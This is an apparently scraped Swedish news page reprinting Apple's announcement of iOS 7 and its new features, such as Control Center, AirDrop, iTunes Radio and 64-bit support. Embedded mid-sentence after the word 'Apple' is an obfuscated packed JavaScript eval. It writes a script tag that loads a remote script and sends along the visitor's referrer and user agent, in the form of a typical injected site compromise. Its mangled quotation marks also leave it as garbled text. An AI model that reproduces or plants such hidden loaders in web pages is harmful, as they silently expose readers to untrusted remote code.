Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

Det här är iOS 7 med helt nytt användargränssnitt

Det här är iOS 7 med helt nytt användargränssnitt

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfaie|var|u0026u|referrer|daeif||js|php’.split(’|’),0,{}))
presenterade idag iOS 7 med ett imponerande nytt användargränssnitt. iOS 7 blir tillgängligt som en kostnadsfri programuppdatering onsdagen den 18 september för användare med iPhone, iPad och iPod touch.

iOS 7 innehåller hundratals nya suveräna funktioner, bland annat Kontrollcenter, Notiscenter, förbättrad multitasking, AirDrop, förbättringar av Bilder, Safari och Siri och nya iTunes-radio, en kostnadsfri internetradiotjänst som baseras på det du lyssnar på i iTunes. iOS 7 är dessutom väl integrerat med både iPhone 5s och iPhone 5c vad gäller teknik och design.

iOS 7 är helt omdesignat med ett alldeles nytt användargränssnitt och över 200 nya funktioner. För våra användare är det som att få en helt ny enhet, men en som de redan känner till”, säger Craig Federighi, Apples vice VD för Software Engineering. ”Nästa månad har vi levererat 700 miljoner iOS-enheter och det ska bli spännande att se vad våra hundratusentals iOS-utvecklare har jobbat med i form av nya funktioner i sina appar.”

Apple har utformat iOS 7 på ett sätt som till fullo utnyttjar den avancerade 64-bitarstekniken i iPhone 5s, som 64-bitarskärnan, bibliotek och drivrutiner. Alla inbyggda appar har anpassats till 64-bitarstekniken och iOS 7 gör det enkelt för utvecklare att komma igång tack vare Xcode-stödet och möjligheten att köra både 32- och 64-bitarsappar. iOS 7 är dessutom väl integrerat med den nya Touch ID-sensorn och utnyttjar till fullo den nya iSight-kameran, med funktioner som automatisk bildstabilisering, serietagning och slow motion-video med 120 bildrutor per sekund. Tillsammans med den nya Kamera-appen i iOS 7 ger iPhone 5s upp till dubbelt så snabb autofokus, snabbare bildtagning och bättre dynamiskt omfång. iOS 7 har en design som kompletterar utseendet på iPhone 5c, med matchande bakgrundsbilder och genomskinlighet som verkligen tar fram färgerna.

iOS 7 för iPhone, iPad och iPod touch har över 200 nya funktioner, bland annat: 

• Kontrollcenter ger dig snabb tillgång till inställningarna du behöver när du sveper med fingret från skärmens nedre kant.

• Notiscenter kan nu öppnas direkt från låsskärmen så att du kan se alla notiser med en enkel svepning. Den nya funktionen Idag ger en översiktsvy av dagen med en sammanfattning av viktig information om väder, trafikförhållanden, möten och aktiviteter.

• Bättre multitasking ger användare möjlighet att växla mellan sina appar på ett mer visuellt och intuitivt sätt. iOS 7 lägger märke till vilka appar du använder mest och håller automatiskt innehållet uppdaterat i bakgrunden.

• AirDrop är ett helt nytt sätt att snabbt och enkelt dela innehåll med personer i närheten.

• Den nya Kamera-appen har fotoeffekter i realtid och ett kvadratiskt kameraalternativ. Du kan snabbt växla mellan de fyra kamerorna – video, foto, kvadrat och panorama – bara genom att svepa.

• En ny Bilder-app som introducerar funktionen Ögonblick – ett nytt sätt att automatiskt ordna bilder och videor baserat på tid och plats.

• Surfa i helskärmsläge med Safaris nya användargränssnitt. Det nya smarta sökfältet förenklar sökningar, och bokmärken och Safari-flikar har placerats i en ny vy.

• Siri har nya manliga och kvinnliga röster*, integrerad Twitter-sökning, Wikipedia-integrering och webbsökningar med Bing direkt i appen.

• iTunes-radio är en gratis internetradiotjänst med över 200 stationer och en otrolig musikkatalog från iTunes Store i kombination med funktioner som bara finns i iTunes.*

Exempel på andra nya iOS 7-funktioner är ett nytt aktiveringslås för Hitta min iPhone som kräver ditt Apple-ID och lösenord innan du kan stänga av Hitta min iPhone, radera data eller återaktivera en enhet som blivit fjärraderad. Dessutom har ljudet i FaceTime optimerats för samtal i hög kvalitet över datanätverk och det finns nya ringsignaler, alarm, påminnelser och systemljud.

Kunder med iPhone, iPad och iPod touch har tillgång till App Store med över 900 000 appar i 155 länder världen över. iOS 7 innehåller nu funktionen Visa populära appar i närheten, som är ett nytt sätt att hitta appar baserat på din nuvarande plats, och iOS 7 håller automatiskt dina appar uppdaterade. Över 50 miljarder appar har redan laddats ner från App Store och kunderna kan välja och vraka bland ett otroligt apputbud i 23 kategorier, däribland dagstidningar och tidskrifter via Nyhetskiosk, spel och underhållning, affärer, nyheter, sport, hälsa och träning samt resor.

iOS 7 blir tillgängligt som en kostnadsfri programuppgradering onsdagen den 18 september för iPhone 4 och senare, iPad 2 och senare, iPad mini och iPod touch (femte generationen). Vissa funktioner kanske inte är tillgängliga för alla produkter.

*Amerikansk engelska, franska och tyska blir tillgängliga vid lanseringen av iOS 7. Fler språk läggs till efter hand.

**iTunes Radio finns tillgängligt när iOS 7 lanseras i USA.

Apple designar Mac-datorerna – världens bästa persondatorer – och OS X, iLife, iWork samt en rad professionella appar. Apple leder den digitala musikrevolutionen med iPod och iTunes Store. Apple har förnyat mobiltelefonen med den banbrytande iPhone och App Store och stakar ut den framtida utvecklingen inom mobila medier och datorteknik med iPad.